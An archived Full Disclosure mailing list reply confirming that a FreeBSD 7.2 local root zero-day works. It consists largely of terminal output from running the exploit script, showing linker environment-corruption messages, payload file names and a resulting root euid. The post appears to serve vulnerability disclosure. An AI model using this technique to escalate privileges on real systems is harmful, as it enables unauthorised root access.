Full Disclosure mailing list archives

Re: ** FreeBSD local r00t zeroday

From: phantomcircuit <phantomcircuit () covertinferno org>
Date: Mon, 30 Nov 2009 15:31:56 -0800

Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

%sh exploit.sh
Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o 
private program.c program.o public public_html run.sh w00t.so.1.0 
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in 
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(phantomcircuit) gid=20(staff) euid=0(root) 
groups=20(staff),0(wheel)
# uname -a
FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0: 
Fri Oct  2 12:21:39 UTC 2009     
root () i386-builder daemonology net:/usr/obj/usr/src/sys/GENERIC  i386
#

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

** FreeBSD local r00t zeroday Kingcope (Nov 30)
- Re: ** FreeBSD local r00t zeroday Ed Carp (Nov 30)
  - Re: ** FreeBSD local r00t zeroday Benji (Nov 30)
    - Re: ** FreeBSD local r00t zeroday Ryan Steinmetz (Nov 30)
    - Re: ** FreeBSD local r00t zeroday David Berard (Nov 30)
    - Re: ** FreeBSD local r00t zeroday bk (Nov 30)
- <Possible follow-ups>
- Re: ** FreeBSD local r00t zeroday phantomcircuit (Nov 30)
  - Re: ** FreeBSD local r00t zeroday Cody Robertson (Nov 30)